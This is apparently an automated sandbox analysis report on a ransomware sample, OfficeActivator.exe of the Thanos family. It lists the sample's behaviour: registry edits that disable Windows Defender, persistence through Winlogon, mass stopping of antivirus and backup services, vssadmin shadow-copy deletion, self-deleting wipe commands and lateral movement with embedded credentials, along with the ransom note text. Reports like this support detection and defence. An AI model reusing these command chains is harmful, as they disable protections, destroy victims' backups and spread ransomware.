Analysis Overview
SHA256
8441f92e8460a7b2ed37ee96affe547a65589b2e8e980a18a6b08b786b48465d
Threat Level: Known bad
The file OfficeActivator.exe was found to be: Known bad.
Malicious Activity Summary
Thanos executable
Modifies WinLogon for persistence
Modifies Windows Defender Real-time Protection settings
Contains code to disable Windows Defender
Disables service(s)
Thanos family
Modifies boot configuration data using bcdedit
Deletes shadow copies
Downloads MZ/PE file
Blocklisted process makes network request
Drops startup file
Windows security modification
Checks computer location settings
Executes dropped EXE
Impair Defenses: Safe Mode Boot
Enumerates connected drives
Network Service Discovery
Modifies WinLogon
Legitimate hosting services abused for malware hosting/C2
Launches sc.exe
Enumerates physical storage devices
System Network Configuration Discovery: Internet Connection Discovery
Unsigned PE
System Location Discovery: System Language Discovery
Runs net.exe
Runs ping.exe
Suspicious use of SendNotifyMessage
Uses Volume Shadow Copy service COM API
Modifies registry key
Kills process with taskkill
Suspicious use of WriteProcessMemory
Suspicious use of FindShellTrayWindow
Suspicious use of AdjustPrivilegeToken
Interacts with shadow copies
Suspicious behavior: EnumeratesProcesses
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-11-08 17:28
Signatures
Contains code to disable Windows Defender
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Thanos executable
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Thanos family
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-08 17:28
Reported
2024-11-08 17:28
Platform
win7-20240903-en
Max time kernel
5s
Max time network
9s
Command Line
Signatures
Contains code to disable Windows Defender
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Modifies WinLogon for persistence
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit = "C:\\Users\\Admin\\AppData\\Local\\Temp\\OfficeActivator.exe,C:\\Windows\\system32\\userinit.exe" | C:\Windows\system32\reg.exe | N/A |
Modifies Windows Defender Real-time Protection settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" | C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe | N/A |
Modifies boot configuration data using bcdedit
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
Impair Defenses: Safe Mode Boot
| Description | Indicator | Process | Target |
| Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\WinDefend | C:\Windows\system32\reg.exe | N/A |
Windows security modification
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features | C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe | N/A |
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
Runs net.exe
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\shutdown.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\system32\shutdown.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe
"C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe"
C:\Windows\system32\reg.exe
"reg.exe" delete HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\WinDefend /f
C:\Windows\system32\bcdedit.exe
"bcdedit.exe" /set {default} safeboot network
C:\Windows\system32\reg.exe
"reg.exe" add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Userinit /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe","C:\Windows\system32\userinit.exe" /f
C:\Windows\system32\net.exe
"net.exe" user Admin ""
C:\Windows\system32\shutdown.exe
"shutdown.exe" /r /t 0
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user Admin ""
C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x0
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" Get-MpPreference -verbose
C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x1
Network
Files
Analysis: behavioral2
Detonation Overview
Submitted
2024-11-08 17:28
Reported
2024-11-08 17:30
Platform
win10v2004-20241007-en
Max time kernel
95s
Max time network
146s
Command Line
Signatures
Contains code to disable Windows Defender
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Disables service(s)
Modifies Windows Defender Real-time Protection settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" | C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe | N/A |
Deletes shadow copies
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\mshta.exe | N/A |
| N/A | N/A | C:\Windows\System32\mshta.exe | N/A |
Downloads MZ/PE file
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mystartup.lnk | C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\n1xyzgh2.exe | N/A |
Windows security modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features\TamperProtection = "0" | C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe | N/A |
Enumerates connected drives
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\E: | C:\Windows\SYSTEM32\vssadmin.exe | N/A |
| File opened (read-only) | \??\F: | C:\Windows\SYSTEM32\vssadmin.exe | N/A |
| File opened (read-only) | \??\g: | C:\Windows\SYSTEM32\vssadmin.exe | N/A |
| File opened (read-only) | \??\G: | C:\Windows\SYSTEM32\vssadmin.exe | N/A |
| File opened (read-only) | \??\F: | C:\Windows\SYSTEM32\vssadmin.exe | N/A |
| File opened (read-only) | \??\e: | C:\Windows\SYSTEM32\vssadmin.exe | N/A |
| File opened (read-only) | \??\E: | C:\Windows\SYSTEM32\vssadmin.exe | N/A |
| File opened (read-only) | \??\H: | C:\Windows\SYSTEM32\vssadmin.exe | N/A |
| File opened (read-only) | \??\g: | C:\Windows\SYSTEM32\vssadmin.exe | N/A |
| File opened (read-only) | \??\D: | C:\Windows\SYSTEM32\vssadmin.exe | N/A |
| File opened (read-only) | \??\h: | C:\Windows\SYSTEM32\vssadmin.exe | N/A |
| File opened (read-only) | \??\H: | C:\Windows\SYSTEM32\vssadmin.exe | N/A |
| File opened (read-only) | \??\e: | C:\Windows\SYSTEM32\vssadmin.exe | N/A |
| File opened (read-only) | \??\D: | C:\Windows\SYSTEM32\vssadmin.exe | N/A |
| File opened (read-only) | \??\h: | C:\Windows\SYSTEM32\vssadmin.exe | N/A |
| File opened (read-only) | \??\G: | C:\Windows\SYSTEM32\vssadmin.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
Modifies WinLogon
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeCaption = "Information..." | C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeText = "Your Files are Encrypted.\r\n\r\nDon’t worry, you can return all your files!\r\n\r\nYou've got 48 hours(2 Days), before you lost your files forever.\r\nI will treat you good if you treat me good too.\r\n\r\nThe Price to get all things to the normal : 20,000$\r\nMy BTC Wallet ID :\r\n1F6sq8YvftTfuE4QcYxfK8s5XFUUHC7sD9\r\n\r\nContact :\r\[email protected]\r\n" | C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe | N/A |
Network Service Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\arp.exe | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\sc.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\sc.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\sc.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\sc.exe | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\n1xyzgh2.exe | N/A |
System Network Configuration Discovery: Internet Connection Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\cmd.exe | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
Interacts with shadow copies
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\vssadmin.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\vssadmin.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\vssadmin.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\vssadmin.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\vssadmin.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\vssadmin.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\vssadmin.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\vssadmin.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\vssadmin.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\vssadmin.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\vssadmin.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\vssadmin.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\vssadmin.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\vssadmin.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\taskkill.exe | N/A |
Runs net.exe
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SYSTEM32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SYSTEM32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SYSTEM32\taskkill.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\n1xyzgh2.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\n1xyzgh2.exe | N/A |
| Token: SeImpersonatePrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\n1xyzgh2.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe | N/A |
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Volume Shadow Copy service COM API
Processes
C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe
"C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" Get-MpPreference -verbose
C:\Windows\SYSTEM32\net.exe
"net.exe" stop avpsus /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop McAfeeDLPAgentService /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop mfewc /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop BMR Boot Service /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop NetBackup BMR MTFTP Service /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop DefWatch /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop ccEvtMgr /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop ccSetMgr /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop SavRoam /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop RTVscan /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop QBFCService /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop QBIDPService /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop Intuit.QuickBooks.FCS /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop QBCFMonitorService /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop YooBackup /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop YooIT /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop zhudongfangyu /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop stc_raw_agent /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop VSNAPVSS /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop VeeamTransportSvc /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop VeeamDeploymentService /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop VeeamNFSSvc /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop veeam /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop PDVFSService /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop BackupExecVSSProvider /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop BackupExecAgentAccelerator /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop BackupExecAgentBrowser /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop BackupExecDiveciMediaService /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop BackupExecJobEngine /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop BackupExecManagementService /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop BackupExecRPCService /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop AcrSch2Svc /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop AcronisAgent /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop CASAD2DWebSvc /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop CAARCUpdateSvc /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop sophos /y
C:\Windows\SYSTEM32\sc.exe
"sc.exe" config SQLTELEMETRY start= disabled
C:\Windows\SYSTEM32\sc.exe
"sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
C:\Windows\SYSTEM32\sc.exe
"sc.exe" config SQLWriter start= disabled
C:\Windows\SYSTEM32\sc.exe
"sc.exe" config SstpSvc start= disabled
C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM mspub.exe /F
C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM mydesktopqos.exe /F
C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM mydesktopservice.exe /F
C:\Windows\SYSTEM32\vssadmin.exe
"vssadmin.exe" Delete Shadows /all /quiet
C:\Windows\SYSTEM32\vssadmin.exe
"vssadmin.exe" resize shadowstorage /for=c: /on=c: /maxsize=401MB
C:\Windows\SYSTEM32\vssadmin.exe
"vssadmin.exe" resize shadowstorage /for=c: /on=c: /maxsize=unbounded
C:\Windows\SYSTEM32\vssadmin.exe
"vssadmin.exe" resize shadowstorage /for=d: /on=d: /maxsize=401MB
C:\Windows\SYSTEM32\vssadmin.exe
"vssadmin.exe" resize shadowstorage /for=d: /on=d: /maxsize=unbounded
C:\Windows\SYSTEM32\vssadmin.exe
"vssadmin.exe" resize shadowstorage /for=e: /on=e: /maxsize=401MB
C:\Windows\SYSTEM32\vssadmin.exe
"vssadmin.exe" resize shadowstorage /for=e: /on=e: /maxsize=unbounded
C:\Windows\SYSTEM32\vssadmin.exe
"vssadmin.exe" resize shadowstorage /for=f: /on=f: /maxsize=401MB
C:\Windows\SYSTEM32\vssadmin.exe
"vssadmin.exe" resize shadowstorage /for=f: /on=f: /maxsize=unbounded
C:\Windows\SYSTEM32\vssadmin.exe
"vssadmin.exe" resize shadowstorage /for=g: /on=g: /maxsize=401MB
C:\Windows\SYSTEM32\vssadmin.exe
"vssadmin.exe" resize shadowstorage /for=g: /on=g: /maxsize=unbounded
C:\Windows\SYSTEM32\vssadmin.exe
"vssadmin.exe" resize shadowstorage /for=h: /on=h: /maxsize=401MB
C:\Windows\SYSTEM32\vssadmin.exe
"vssadmin.exe" resize shadowstorage /for=h: /on=h: /maxsize=unbounded
C:\Windows\SYSTEM32\vssadmin.exe
"vssadmin.exe" Delete Shadows /all /quiet
C:\Windows\SYSTEM32\cmd.exe
"cmd.exe" /c rd /s /q %SYSTEMDRIVE%\$Recycle.bin
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecVSSProvider /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop avpsus /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BMR Boot Service /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecJobEngine /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop DefWatch /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop RTVscan /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop McAfeeDLPAgentService /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop mfewc /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop ccEvtMgr /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop zhudongfangyu /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop stc_raw_agent /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecAgentBrowser /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecAgentAccelerator /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop sophos /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecManagementService /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecRPCService /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop AcronisAgent /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VeeamDeploymentService /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop Intuit.QuickBooks.FCS /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VeeamNFSSvc /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SavRoam /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop AcrSch2Svc /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop ccSetMgr /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop YooBackup /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop YooIT /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop QBIDPService /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop veeam /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VeeamTransportSvc /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop CASAD2DWebSvc /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop CAARCUpdateSvc /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop QBCFMonitorService /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop QBFCService /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop PDVFSService /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VSNAPVSS /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecDiveciMediaService /y
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
C:\Windows\SYSTEM32\net.exe
"net.exe" use \\10.127.0.120 /USER:SHJPOLICE\amer !Omar2012
C:\Windows\System32\mshta.exe
"C:\Windows\System32\mshta.exe" C:\Users\Admin\Desktop\HOW_TO_DECYPHER_FILES.hta
C:\Users\Admin\AppData\Local\Temp\n1xyzgh2.exe
"C:\Users\Admin\AppData\Local\Temp\n1xyzgh2.exe" \10.127.0.120 -u SHJPOLICE\amer -p !Omar2012 -d -f -h -s -n 2 -c C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe
C:\Windows\SYSTEM32\arp.exe
"arp" -a
C:\Windows\SYSTEM32\cmd.exe
"cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe
C:\Windows\system32\PING.EXE
ping 127.0.0.7 -n 3
C:\Windows\system32\choice.exe
choice /C Y /N /D Y /T 3
C:\Windows\system32\fsutil.exe
fsutil file setZeroData offset=0 length=524288 “%s”
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.109.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.109.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.poweradmin.com | udp |
| US | 8.8.8.8:53 | 228.179.250.142.in-addr.arpa | udp |
| US | 52.1.55.52:443 | www.poweradmin.com | tcp |
| US | 8.8.8.8:53 | 134.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 52.55.1.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | cutewallpaper.org | udp |
| US | 172.67.211.67:443 | cutewallpaper.org | tcp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| GB | 142.250.187.227:80 | c.pki.goog | tcp |
| US | 8.8.8.8:53 | 227.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 67.211.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 154.239.44.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.42.69.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.208.201.84.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.210.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.227.111.52.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_3mxr4kmo.zg3.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Users\Admin\Desktop\HOW_TO_DECYPHER_FILES.txt
| MD5 | 0ae29f187b3b8d04009f0d23a579214b |
| SHA1 | a6d3e91ef83e31895bd9096a176a03007e115b64 |
| SHA256 | e20ad0e28e004eb0a6c039d735498d9584b4f01eef97857699a77843713131a0 |
| SHA512 | 4b9ba243592e0884a06bbcccbc80fd5324049c860002403c2bf12fba0b271fa3c876eaaeb9119b745844bf554d8709ea7458c20f0a234f26a76839b7dce5c8d3 |
C:\Users\Admin\AppData\Local\Temp\n1xyzgh2.exe
| MD5 | b1dfb4f9eb3e598d1892a3bd3a92f079 |
| SHA1 | 0fc135b131d0bb47c9a0aaf02490701303b76d3b |
| SHA256 | ab50d8d707b97712178a92bbac74ccc2a5699eb41c17aa77f713ff3e568dcedb |
| SHA512 | 98454df86ddddf20e0b7bd19566006dbec431326e8aa57600aff460e9bec3e6489e43e95be3b252bf78a2edd5c203254508e9b55e756b680c100560664278ca2 |
C:\Users\Admin\Desktop\HOW_TO_DECYPHER_FILES.hta
| MD5 | 78448c43a413ac717e64663839705bea |
| SHA1 | eb1d5dc19ca57979f0168d824509fa923c92cf4e |
| SHA256 | 221bf8f8e9107271b5679746a32f7f13da80f3118429d04a6fc8171202b98683 |
| SHA512 | dd2bf4007b175b41d264b0dbff2507a25023f55893ef6a6bba0762e7baa7f5b58dc8f4a0c7dfa89f5463be62630f8c357cb13e2713d5d8edb9be7ad1ca4dce18 |